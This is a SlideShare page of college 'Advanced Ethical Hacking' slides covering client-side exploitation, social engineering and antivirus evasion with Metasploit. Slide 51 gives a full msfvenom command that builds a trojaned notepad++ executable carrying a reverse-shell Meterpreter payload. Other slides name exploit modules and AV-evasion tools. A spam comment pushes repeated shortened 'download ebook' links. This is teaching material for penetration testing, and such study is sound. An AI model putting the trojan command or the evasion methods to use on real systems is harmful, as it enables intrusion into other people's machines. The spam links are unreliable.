Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
CNIT 124:
Advanced Ethical
Hacking
Ch 10: Client-Side Exploitation
Rev. 10-26-17
Low-Hanging Fruit
• The weakest defenders have these sorts
of problems
– Vulnerable services listening on network ports
– ...
Defenses
• Install all security patches
• Audit passwords and remove easily-
guessed or easily–cracked ones
• Control user...
Other Attacks
• That don't require direct network access
• Target local software—not listening on a
network port
• Payload...
Topics
• Bypassing Filters with Metasploit Payloads
• Client-Side Attacks
– Browser Exploitation
– Running Scripts in a Me...
Bypassing Filters with
Metasploit Payloads
All Ports
• Filters may not allow an outgoing
connection to port 4444 (Metasploit's
reverse_tcp default)
– But it may allo...
HTTP and HTTPS Payloads
• Traffic follows HTTP and HTTPS
specifications
• Packet-based, not stream-based like TCP
payloads...
Proxy Servers
• HTTP and HTTPS payloads use the Internet
Explorer proxy settings
– May fail when running as SYSTEM because...
Client-Side Attacks
Local Attacks
• Attacking Web browsers, document viewers,
music players, etc.
– Create malicious file
– Trick user into op...
Attacking Through NAT
• Workstations and mobile devices typically
lack a public IP address
– They cannot be directly attac...
Browser Exploitation
Malicious Web
Page
• Get user to visit a
malicious Web
page
• Hijack execution in
the browser and
execute a payload
Aurora Attack
• Chinese hackers used it against Google,
Adobe, and Yahoo!
• A zero-day IE vulnerability
– After this attac...
Running Scripts in a
Meterpreter Session
Normal IE Attack
• Start a malicious Web server
Open the Malicious Page
Own the Target
Meterpreter Lives in a Process
• Terminating this process kills the
Meterpreter session
Migrate Script
Info About Migrate
AutoRunScript
Explorer.exe
• Draws the desktop and the Start button
• Runs until the user logs out
PDF Exploits
Adobe Reader Vulns
• Not as many as there used to be
– Link Ch 10a
Adobe PDF Embedded EXE Social
Engineering
• Not considered a coding error to be patched
• A feature of Adobe Reader that c...
Vulnerable Form
• Link Ch 10b
Warning Message
Java Exploits
Multiplatform
• Java is very popular because the same
code can be run in a Java Virtual Machine
on any platform
– Windows,...
Warning Message
Nothing Very Recent
browser_autopwn
Start All The Modules
20 Modules
Results
• IE 11 on Win 7: FAILS because I don't have
Java installed
• Firefox 41.0 on Win7 FAILS
• Chrome 46.0.2490.80 on ...
IE 7 on Win Server 2008
IE 7 on Win Server 2008
IE 7 on Win Server 2008
IE 7 on Win Server 2008

FAILS
CNIT 124:
Advanced Ethical
Hacking
Ch 11: Social Engineering
Spear-Phishing Attacks
Many Attack Options
Gmail Blocks It
• Default Metasploit payloads are blocked
by virus scanners
Web Attacks
Web Attack Options
Attack Explanations
• "Metasploit Browser Expoit Method" is like
browser_autopwn
• Credential Harvester makes fake login
p...
Broken in Kali 2
• The update option is broken
• You can force an update (link Ch 11a)
• But even then, Credential Harvest...
CNIT 124:
Advanced Ethical
Hacking
Ch 12: Bypassing Antivirus
Applications
Trojans
• Add malware to existing executables with
msfvenom
• Only works with files that don't check
integrity with hash v...
AV
• This trojan works on Win 7, but many AV
products catch it
Encoding
• Metasploit includes encoding engines, like
shikata_ga_nai, but the AV vendors are on
to them and they actually ...
Cross-Compiling
• You can export the malware as C code and
compile it, adding a random value
– Still, almost as many AV ve...
Encrypting with Hyperion
• Hyperion encrypts the file with AES, and
with a key drawn from a small portion of
the possible ...
Veil-Evasion
• Big, powerful
program
• Takes a while
to install on
Kali
• Results are
not
impressive
CNIT 124 Ch10-12: Local Exploits through Bypassing AV
CNIT 124 Ch10-12: Local Exploits through Bypassing AV
CNIT 124 Ch10-12: Local Exploits through Bypassing AV
Upcoming SlideShare
Loading in …5
×

CNIT 124 Ch10-12: Local Exploits through Bypassing AV

746 views

Published on

Slides for a college course in "Advanced Ethical Hacking" at CCSF. Instructor: Sam Bowne

Course Web page:

https://samsclass.info/124/124_F17.shtml

Based on "Penetration Testing: A Hands-On Introduction to Hacking" by Georgia Weidman -- ISBN-10: 1593275641, No Starch Press; 1 edition (June 8, 2014)

Published in: Education
  • DOWNLOAD FULL BOOKS, INTO AVAILABLE FORMAT ......................................................................................................................... ......................................................................................................................... 1.DOWNLOAD FULL. PDF EBOOK here { https://tinyurl.com/yxufevpm } ......................................................................................................................... 1.DOWNLOAD FULL. EPUB Ebook here { https://tinyurl.com/yxufevpm } ......................................................................................................................... 1.DOWNLOAD FULL. doc Ebook here { https://tinyurl.com/yxufevpm } ......................................................................................................................... 1.DOWNLOAD FULL. PDF EBOOK here { https://tinyurl.com/yxufevpm } ......................................................................................................................... 1.DOWNLOAD FULL. EPUB Ebook here { https://tinyurl.com/yxufevpm } ......................................................................................................................... 1.DOWNLOAD FULL. doc Ebook here { https://tinyurl.com/yxufevpm } ......................................................................................................................... ......................................................................................................................... ......................................................................................................................... .............. Browse by Genre Available eBooks ......................................................................................................................... Art, Biography, Business, Chick Lit, Children's, Christian, Classics, Comics, Contemporary, Cookbooks, Crime, Ebooks, Fantasy, Fiction, Graphic Novels, Historical Fiction, History, Horror, Humor And Comedy, Manga, Memoir, Music, Mystery, Non Fiction, Paranormal, Philosophy, Poetry, Psychology, Religion, Romance, Science, Science Fiction, Self Help, Suspense, Spirituality, Sports, Thriller, Travel, Young Adult,
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here

CNIT 124 Ch10-12: Local Exploits through Bypassing AV

  1. 1. CNIT 124: Advanced Ethical Hacking Ch 10: Client-Side Exploitation Rev. 10-26-17
  2. 2. Low-Hanging Fruit • The weakest defenders have these sorts of problems – Vulnerable services listening on network ports – Unchanged default passwords – Misconfigured web servers
  3. 3. Defenses • Install all security patches • Audit passwords and remove easily- guessed or easily–cracked ones • Control user roles – Regular users don't have administrative rights on their workstations – Software is installed and maintained by the security staff
  4. 4. Other Attacks • That don't require direct network access • Target local software—not listening on a network port • Payloads – Bind shell won't work, because such systems are behind firewalls – Reverse connections may work
  5. 5. Topics • Bypassing Filters with Metasploit Payloads • Client-Side Attacks – Browser Exploitation – Running Scripts in a Meterpreter Session – PDF Exploits – Java Exploits – browser_autopwn
  6. 6. Bypassing Filters with Metasploit Payloads
  7. 7. All Ports • Filters may not allow an outgoing connection to port 4444 (Metasploit's reverse_tcp default) – But it may allow connections to ports 80 or 443 • reverse_tcp_allports payload will try all ports – First it tries LPORT, then all other ports – May cause target application to hang for a long time
  8. 8. HTTP and HTTPS Payloads • Traffic follows HTTP and HTTPS specifications • Packet-based, not stream-based like TCP payloads • Interrupted sessions can recover and reconnect
  9. 9. Proxy Servers • HTTP and HTTPS payloads use the Internet Explorer proxy settings – May fail when running as SYSTEM because those proxy settings are not defined • reverse_http_proxy payload allows the attacker to manually specify proxy settings
  10. 10. Client-Side Attacks
  11. 11. Local Attacks • Attacking Web browsers, document viewers, music players, etc. – Create malicious file – Trick user into opening it on the target system – Then the machine makes a connection back to the attacker • Such attacks are more important in penetration tests – Because more companies are finding and fixing network-listening vulnerabilities
  12. 12. Attacking Through NAT • Workstations and mobile devices typically lack a public IP address – They cannot be directly attacked – But they can still make outgoing connections to the attacker (reverse) – BUT it all relies on social engineering – Target must open a file, or click a link
  13. 13. Browser Exploitation
  14. 14. Malicious Web Page • Get user to visit a malicious Web page • Hijack execution in the browser and execute a payload
  15. 15. Aurora Attack • Chinese hackers used it against Google, Adobe, and Yahoo! • A zero-day IE vulnerability – After this attack, Google switched to Chrome • Metasploit module – exploit/windows/browser/ms10_002_aurora
  16. 16. Running Scripts in a Meterpreter Session
  17. 17. Normal IE Attack • Start a malicious Web server
  18. 18. Open the Malicious Page
  19. 19. Own the Target
  20. 20. Meterpreter Lives in a Process • Terminating this process kills the Meterpreter session
  21. 21. Migrate Script
  22. 22. Info About Migrate
  23. 23. AutoRunScript
  24. 24. Explorer.exe • Draws the desktop and the Start button • Runs until the user logs out
  25. 25. PDF Exploits
  26. 26. Adobe Reader Vulns • Not as many as there used to be – Link Ch 10a
  27. 27. Adobe PDF Embedded EXE Social Engineering • Not considered a coding error to be patched • A feature of Adobe Reader that can be abused • exploit/windows/fileformat/ adobe_pdf_embedded_exe • Does not work on Adobe Reader 8.12 on Windows Server 2008 • Does not work in Adobe Reader DC on Win 7
  28. 28. Vulnerable Form • Link Ch 10b
  29. 29. Warning Message
  30. 30. Java Exploits
  31. 31. Multiplatform • Java is very popular because the same code can be run in a Java Virtual Machine on any platform – Windows, Mac, Linux, Android • Therefore exploitation is also multiplatform • Must trick user into opening a malicious URL
  32. 32. Warning Message
  33. 33. Nothing Very Recent
  34. 34. browser_autopwn
  35. 35. Start All The Modules
  36. 36. 20 Modules
  37. 37. Results • IE 11 on Win 7: FAILS because I don't have Java installed • Firefox 41.0 on Win7 FAILS • Chrome 46.0.2490.80 on Win 7 FAILS
  38. 38. IE 7 on Win Server 2008
  39. 39. IE 7 on Win Server 2008
  40. 40. IE 7 on Win Server 2008
  41. 41. IE 7 on Win Server 2008
 FAILS
  42. 42. CNIT 124: Advanced Ethical Hacking Ch 11: Social Engineering
  43. 43. Spear-Phishing Attacks
  44. 44. Many Attack Options
  45. 45. Gmail Blocks It • Default Metasploit payloads are blocked by virus scanners
  46. 46. Web Attacks
  47. 47. Web Attack Options
  48. 48. Attack Explanations • "Metasploit Browser Expoit Method" is like browser_autopwn • Credential Harvester makes fake login pages • Tabnapping says "Please Wait" and when the user clicks on another tab, changes to a fake login page
  49. 49. Broken in Kali 2 • The update option is broken • You can force an update (link Ch 11a) • But even then, Credential Harvester is broken – Because it uses /var/www instead of /var/ www/html
  50. 50. CNIT 124: Advanced Ethical Hacking Ch 12: Bypassing Antivirus Applications
  51. 51. Trojans • Add malware to existing executables with msfvenom • Only works with files that don't check integrity with hash values or signatures • msfvenom -p windows/meterpreter/ reverse_tcp LHOST=192.168.119.130 LPORT=2345 -x /root/Desktop/notepad+ +.exe -k -f exe > evilnotepad++.exe
  52. 52. AV • This trojan works on Win 7, but many AV products catch it
  53. 53. Encoding • Metasploit includes encoding engines, like shikata_ga_nai, but the AV vendors are on to them and they actually make the trojan more detectable
  54. 54. Cross-Compiling • You can export the malware as C code and compile it, adding a random value – Still, almost as many AV vendors catch it • Exporting malware as Python and then compiling it on Windows to an EXE worked well for me a couple of years ago – Clumsy process, produces large EXE files
  55. 55. Encrypting with Hyperion • Hyperion encrypts the file with AES, and with a key drawn from a small portion of the possible keyspace • Then deletes the key • When run, it brute-forces the key • This fooled Microsoft Security Essentials, but not many other AV engines
  56. 56. Veil-Evasion • Big, powerful program • Takes a while to install on Kali • Results are not impressive

×